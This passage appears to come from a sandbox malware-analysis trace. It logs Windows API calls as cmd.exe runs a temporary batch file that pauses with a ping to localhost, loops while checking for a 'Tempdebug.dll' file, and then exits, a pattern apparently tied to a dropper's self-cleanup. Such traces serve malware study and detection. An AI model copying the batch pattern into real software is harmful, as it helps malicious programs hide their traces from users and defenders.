lpBuffer="C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x63 [0051.255] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0051.256] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0051.256] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0051.256] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\Ping.*", fInfoLevelId=0x1, lpFindFileData=0x24e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e988) returned 0xffffffff [0051.256] GetLastError () returned 0x2 [0051.256] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop\\Ping", fInfoLevelId=0x1, lpFindFileData=0x24e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e988) returned 0xffffffff [0051.256] GetLastError () returned 0x2 [0051.256] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0051.256] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\Ping.*", fInfoLevelId=0x1, lpFindFileData=0x24e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e988) returned 0x431ef0 [0051.256] FindClose (in: hFindFile=0x431ef0 | out: hFindFile=0x431ef0) returned 1 [0051.256] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.COM", fInfoLevelId=0x1, lpFindFileData=0x24e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e988) returned 0xffffffff [0051.257] GetLastError () returned 0x2 [0051.257] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\PING.EXE", fInfoLevelId=0x1, lpFindFileData=0x24e988, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24e988) returned 0x431ef0 [0051.257] FindClose (in: hFindFile=0x431ef0 | out: hFindFile=0x431ef0) returned 1 [0051.257] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0051.257] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0051.257] GetConsoleTitleW (in: lpConsoleTitle=0x24ee80, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0051.257] InitializeProcThreadAttributeList (in: lpAttributeList=0x24ed08, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x24edd0 | out: lpAttributeList=0x24ed08, lpSize=0x24edd0) returned 1 [0051.257] UpdateProcThreadAttribute (in: lpAttributeList=0x24ed08, dwFlags=0x0, Attribute=0x60001, lpValue=0x24edc8, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x24ed08, lpPreviousValue=0x0) returned 1 [0051.257] GetStartupInfoW (in: lpStartupInfo=0x24ecc4 | out: lpStartupInfo=0x24ecc4*(cb=0x44, lpReserved="", lpDesktop="Winsta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x1, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x1f4b, hStdOutput=0x0, hStdError=0x1000000)) [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="=::=::\\", _MaxCount=0x7) returned 38 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="=ExitCo", _MaxCount=0x7) returned 38 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="FP_NO_H", _MaxCount=0x7) returned -3 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="PROMPT=", _MaxCount=0x7) returned -13 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="PSExecu", _MaxCount=0x7) returned -13 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="PSModul", _MaxCount=0x7) returned -13 [0051.257] _wcsnicmp (_String1="COPYCMD", _String2="PUBLIC=", _MaxCount=0x7) returned -13 [0051.258] _wcsnicmp (_String1="COPYCMD", _String2="SESSION", _MaxCount=0x7) returned -16 [0051.258] _wcsnicmp (_String1="COPYCMD", _String2="SystemD", _MaxCount=0x7) returned -16 [0051.258] _wcsnicmp (_String1="COPYCMD", _String2="SystemR", _MaxCount=0x7) returned -16 [0051.258] _wcsnicmp (_String1="COPYCMD", _String2="TEMP=C:", _MaxCount=0x7) returned -17 [0051.258] _wcsnicmp (_String1="COPYCMD", _String2="TMP=C:\\", _MaxCount=0x7) returned -17 [0051.258] _wcsnicmp (_String1="COPYCMD", _String2="USERDOM", _MaxCount=0x7) returned -18 [0051.258] _wcsnicmp (_String1="COPYCMD", _String2="USERNAM", _MaxCount=0x7) returned -18 [0051.258] _wcsnicmp (_String1="COPYCMD", _String2="USERPRO", _MaxCount=0x7) returned -18 [0051.258] _wcsnicmp (_String1="COPYCMD", _String2="windir=", _MaxCount=0x7) returned -20 [0051.258] lstrcmpW (lpString1="\\PING.EXE", lpString2="\\XCOPY.EXE") returned -1 [0051.258] CreateProcessW (in: lpApplicationName="C:\\Windows\\system32\\PING.EXE", lpCommandLine="Ping 127.0.0.1 -n 3", lpProcessAttributes=0x0, lpThreadAttributes=0x0, bInheritHandles=1, dwCreationFlags=0x80000, lpEnvironment=0x0, lpCurrentDirectory="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop", lpStartupInfo=0x24ed64*(cb=0x48, lpReserved=0x0, lpDesktop="Winsta0\\Default", lpTitle="Ping 127.0.0.1 -n 3", dwX=0x0, dwY=0x1, dwXSize=0x64, dwYSize=0x64, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x1, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0), lpProcessInformation=0x24edb0 | out: lpCommandLine="Ping 127.0.0.1 -n 3", lpProcessInformation=0x24edb0*(hProcess=0x58, hThread=0x54, dwProcessId=0xce8, dwThreadId=0xcec)) returned 1 [0051.267] CloseHandle (hObject=0x54) returned 1 [0051.267] SetEnvironmentVariableW (lpName="COPYCMD", lpValue=0x0) returned 1 [0051.267] GetEnvironmentStringsW () returned 0x421ee8* [0051.267] FreeEnvironmentStringsW (penv=0x421ee8) returned 1 [0051.267] WaitForSingleObject (hHandle=0x58, dwMilliseconds=0xffffffff) returned 0x0 [0053.392] GetExitCodeProcess (in: hProcess=0x58, lpExitCode=0x24eca4 | out: lpExitCode=0x24eca4*=0x0) returned 1 [0053.392] CloseHandle (hObject=0x58) returned 1 [0053.392] _vsnwprintf (in: _Buffer=0x24edec, _BufferCount=0x13, _Format="%08X", _ArgList=0x24ecb0 | out: _Buffer="00000000") returned 8 [0053.392] SetEnvironmentVariableW (lpName="=ExitCode", lpValue="00000000") returned 1 [0053.392] GetEnvironmentStringsW () returned 0x421ee8* [0053.392] FreeEnvironmentStringsW (penv=0x421ee8) returned 1 [0053.392] SetEnvironmentVariableW (lpName="=ExitCodeAscii", lpValue=0x0) returned 1 [0053.392] GetEnvironmentStringsW () returned 0x421ee8* [0053.392] FreeEnvironmentStringsW (penv=0x421ee8) returned 1 [0053.392] DeleteProcThreadAttributeList (in: lpAttributeList=0x24ed08 | out: lpAttributeList=0x24ed08) [0053.392] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.392] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0053.392] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.393] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0053.393] _get_osfhandle (_FileHandle=0) returned 0x3 [0053.393] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0053.393] SetConsoleInputExeNameW () returned 0x1 [0053.393] GetConsoleOutputCP () returned 0x1b5 [0053.393] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0053.393] SetThreadUILanguage (LangId=0x0) returned 0x409 [0053.393] CreateFileW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24f524, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0053.393] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0053.393] _get_osfhandle (_FileHandle=3) returned 0x58 [0053.393] SetFilePointer (in: hFile=0x58, lDistanceToMove=148, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x94 [0053.394] _get_osfhandle (_FileHandle=3) returned 0x58 [0053.394] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0x94 [0053.394] ReadFile (in: hFile=0x58, lpBuffer=0x49e76640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x24f508, lpOverlapped=0x0 | out: lpBuffer=0x49e76640*, lpNumberOfBytesRead=0x24f508*=0x61, lpOverlapped=0x0) returned 1 [0053.395] SetFilePointer (in: hFile=0x58, lDistanceToMove=218, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xda [0053.395] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e76640, cbMultiByte=70, lpWideCharStr=0x49e7c640, cchWideChar=8191 | out: lpWideCharStr="if exist \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll\" goto Repeat\r\n") returned 70 [0053.395] _get_osfhandle (_FileHandle=3) returned 0x58 [0053.395] GetFileType (hFile=0x58) returned 0x1 [0053.395] _get_osfhandle (_FileHandle=3) returned 0x58 [0053.395] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xda [0053.395] _wcsicmp (_String1="exist", _String2="/I") returned 54 [0053.395] _wcsicmp (_String1="ERRORLEVEL", _String2="exist") returned -6 [0053.395] _wcsicmp (_String1="EXIST", _String2="exist") returned 0 [0053.396] _tell (_FileHandle=3) returned 218 [0053.396] _close (_FileHandle=3) returned 0 [0053.396] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f2dc | out: _Buffer="\r\n") returned 2 [0053.396] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.397] GetFileType (hFile=0x7) returned 0x2 [0053.397] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.397] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f29c | out: lpMode=0x24f29c) returned 1 [0053.397] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.397] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f2c8, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f2c8*=0x2) returned 1 [0053.397] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x49e80640, nSize=0x2000 | out: lpBuffer="$P$G") returned 0x4 [0053.397] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0053.397] _vsnwprintf (in: _Buffer=0x49e75e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x24f2d8 | out: _Buffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 32 [0053.397] _vsnwprintf (in: _Buffer=0x49e75e80, _BufferCount=0x3de, _Format="%c", _ArgList=0x24f2d8 | out: _Buffer=">") returned 1 [0053.397] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.397] GetFileType (hFile=0x7) returned 0x2 [0053.397] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.397] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f2a0 | out: lpMode=0x24f2a0) returned 1 [0053.397] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.397] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e75e40*, nNumberOfCharsToWrite=0x21, lpNumberOfCharsWritten=0x24f2cc, lpReserved=0x0 | out: lpBuffer=0x49e75e40*, lpNumberOfCharsWritten=0x24f2cc*=0x21) returned 1 [0053.398] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x24f55c | out: _Buffer="if ") returned 3 [0053.398] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.398] GetFileType (hFile=0x7) returned 0x2 [0053.398] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.398] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f51c | out: lpMode=0x24f51c) returned 1 [0053.398] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.398] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0x24f548, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f548*=0x3) returned 1 [0053.398] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="%s %s ", _ArgList=0x24f53c | out: _Buffer="exist \"C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll\" ") returned 54 [0053.398] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.398] GetFileType (hFile=0x7) returned 0x2 [0053.399] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.399] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f4fc | out: lpMode=0x24f4fc) returned 1 [0053.399] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.399] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x36, lpNumberOfCharsWritten=0x24f528, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f528*=0x36) returned 1 [0053.399] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.399] GetFileType (hFile=0x7) returned 0x2 [0053.399] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.399] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f508 | out: lpMode=0x24f508) returned 1 [0053.399] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.399] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4319d8*, nNumberOfCharsToWrite=0x4, lpNumberOfCharsWritten=0x24f534, lpReserved=0x0 | out: lpBuffer=0x4319d8*, lpNumberOfCharsWritten=0x24f534*=0x4) returned 1 [0053.399] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x24f540 | out: _Buffer=" Repeat ") returned 8 [0053.400] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.400] GetFileType (hFile=0x7) returned 0x2 [0053.400] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.400] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f500 | out: lpMode=0x24f500) returned 1 [0053.400] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.400] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x8, lpNumberOfCharsWritten=0x24f52c, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f52c*=0x8) returned 1 [0053.400] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f57c | out: _Buffer="\r\n") returned 2 [0053.400] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.400] GetFileType (hFile=0x7) returned 0x2 [0053.400] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.400] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f53c | out: lpMode=0x24f53c) returned 1 [0053.400] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.400] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f568, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f568*=0x2) returned 1 [0053.401] GetFullPathNameW (in: lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll", nBufferLength=0x208, lpBuffer=0x24f0e4, lpFilePart=0x24ee90 | out: lpBuffer="C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll", lpFilePart=0x24ee90*="Tempdebug.dll") returned 0x2d [0053.401] wcsncmp (_String1="C:\\U", _String2="\\\\.\\", _MaxCount=0x4) returned -25 [0053.401] FindFirstFileExW (in: lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll", fInfoLevelId=0x1, lpFindFileData=0x24ee94, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x24ee94) returned 0xffffffff [0053.401] GetLastError () returned 0x2 [0053.401] FindClose (in: hFindFile=0xffffffff | out: hFindFile=0xffffffff) returned 0 [0053.401] GetLastError () returned 0x6 [0053.401] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.401] SetConsoleMode (hConsoleHandle=0x7, dwMode=0x3) returned 1 [0053.401] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.401] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x49e741ac | out: lpMode=0x49e741ac) returned 1 [0053.401] _get_osfhandle (_FileHandle=0) returned 0x3 [0053.401] GetConsoleMode (in: hConsoleHandle=0x3, lpMode=0x49e741b0 | out: lpMode=0x49e741b0) returned 1 [0053.401] SetConsoleInputExeNameW () returned 0x1 [0053.401] GetConsoleOutputCP () returned 0x1b5 [0053.401] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x49e74260 | out: lpCPInfo=0x49e74260) returned 1 [0053.401] SetThreadUILanguage (LangId=0x0) returned 0x409 [0053.402] CreateFileW (lpFileName="C:\\Users\\BGC6U8~1\\AppData\\Local\\Temp\\iun4816.bat" (normalized: "c:\\users\\bgc6u8~1\\appdata\\local\\temp\\iun4816.bat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x24f524, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x58 [0053.402] _open_osfhandle (_OSFileHandle=0x58, _Flags=8) returned 3 [0053.402] _get_osfhandle (_FileHandle=3) returned 0x58 [0053.402] SetFilePointer (in: hFile=0x58, lDistanceToMove=218, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xda [0053.402] _get_osfhandle (_FileHandle=3) returned 0x58 [0053.402] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xda [0053.402] ReadFile (in: hFile=0x58, lpBuffer=0x49e76640, nNumberOfBytesToRead=0x1fff, lpNumberOfBytesRead=0x24f508, lpOverlapped=0x0 | out: lpBuffer=0x49e76640*, lpNumberOfBytesRead=0x24f508*=0x1b, lpOverlapped=0x0) returned 1 [0053.402] SetFilePointer (in: hFile=0x58, lDistanceToMove=235, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0xeb [0053.402] MultiByteToWideChar (in: CodePage=0x1b5, dwFlags=0x1, lpMultiByteStr=0x49e76640, cbMultiByte=17, lpWideCharStr=0x49e7c640, cchWideChar=8191 | out: lpWideCharStr="cmd.exe /c exit\r\ns\\BGC6U8~1\\AppData\\Local\\Tempdebug.dll\" goto Repeat\r\n") returned 17 [0053.402] _get_osfhandle (_FileHandle=3) returned 0x58 [0053.402] GetFileType (hFile=0x58) returned 0x1 [0053.402] _get_osfhandle (_FileHandle=3) returned 0x58 [0053.402] SetFilePointer (in: hFile=0x58, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x1 | out: lpDistanceToMoveHigh=0x0) returned 0xeb [0053.403] _tell (_FileHandle=3) returned 235 [0053.403] _close (_FileHandle=3) returned 0 [0053.403] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f2dc | out: _Buffer="\r\n") returned 2 [0053.403] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.403] GetFileType (hFile=0x7) returned 0x2 [0053.403] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.403] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f29c | out: lpMode=0x24f29c) returned 1 [0053.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.404] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f2c8, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f2c8*=0x2) returned 1 [0053.404] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x49e75260 | out: lpBuffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 0x20 [0053.404] _vsnwprintf (in: _Buffer=0x49e75e40, _BufferCount=0x3fe, _Format="%s", _ArgList=0x24f2d8 | out: _Buffer="C:\\Users\\BGC6u8Oy yXGxkR\\Desktop") returned 32 [0053.404] _vsnwprintf (in: _Buffer=0x49e75e80, _BufferCount=0x3de, _Format="%c", _ArgList=0x24f2d8 | out: _Buffer=">") returned 1 [0053.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.404] GetFileType (hFile=0x7) returned 0x2 [0053.404] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.404] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f2a0 | out: lpMode=0x24f2a0) returned 1 [0053.404] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.404] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e75e40*, nNumberOfCharsToWrite=0x21, lpNumberOfCharsWritten=0x24f2cc, lpReserved=0x0 | out: lpBuffer=0x49e75e40*, lpNumberOfCharsWritten=0x24f2cc*=0x21) returned 1 [0053.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.405] GetFileType (hFile=0x7) returned 0x2 [0053.405] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.405] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f524 | out: lpMode=0x24f524) returned 1 [0053.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.405] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x4214f8*, nNumberOfCharsToWrite=0x7, lpNumberOfCharsWritten=0x24f550, lpReserved=0x0 | out: lpBuffer=0x4214f8*, lpNumberOfCharsWritten=0x24f550*=0x7) returned 1 [0053.405] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="%s ", _ArgList=0x24f55c | out: _Buffer=" /c exit ") returned 9 [0053.405] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.405] GetFileType (hFile=0x7) returned 0x2 [0053.406] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.406] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f51c | out: lpMode=0x24f51c) returned 1 [0053.406] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.406] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x9, lpNumberOfCharsWritten=0x24f548, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f548*=0x9) returned 1 [0053.406] _vsnwprintf (in: _Buffer=0x49e84640, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0x24f57c | out: _Buffer="\r\n") returned 2 [0053.406] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.406] GetFileType (hFile=0x7) returned 0x2 [0053.406] GetStdHandle (nStdHandle=0xfffffff5) returned 0x7 [0053.406] GetConsoleMode (in: hConsoleHandle=0x7, lpMode=0x24f53c | out: lpMode=0x24f53c) returned 1 [0053.406] _get_osfhandle (_FileHandle=1) returned 0x7 [0053.406] WriteConsoleW (in: hConsoleOutput=0x7, lpBuffer=0x49e84640*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0x24f568, lpReserved=0x0 | out: lpBuffer=0x49e84640*, lpNumberOfCharsWritten=0x24f568*=0x2) returned 1 [0053.406] _wcsicmp (_String1="cmd.exe", _String2="DIR") returned -1 [0053.406] _wcsicmp (_String1="cmd.exe", _String2="ERASE") returned -2 [0053.406] _wcsicmp (_String1="cmd.exe", _String2="DEL") returned -1 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="TYPE") returned -17 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="COPY") returned -2 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="CD") returned 9 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="CHDIR") returned 5 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="RENAME") returned -15 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="REN") returned -15 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="ECHO") returned -2 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="SET") returned -16 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="PAUSE") returned -13 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="DATE") returned -1 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="TIME") returned -17 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="PROMPT") returned -13 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="MD") returned -10 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="MKDIR") returned -10 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="RD") returned -15 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="RMDIR") returned -15 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="PATH") returned -13 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="GOTO") returned -4 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="SHIFT") returned -16 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="CLS") returned 1 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="CALL") returned 12 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="VERIFY") returned -19 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="VER") returned -19 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="VOL") returned -19 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="EXIT") returned -2 [0053.407] _wcsicmp (_String1="cmd.exe", _String2="SETLOCAL") returned -16 [0053.407] _wcsicmp 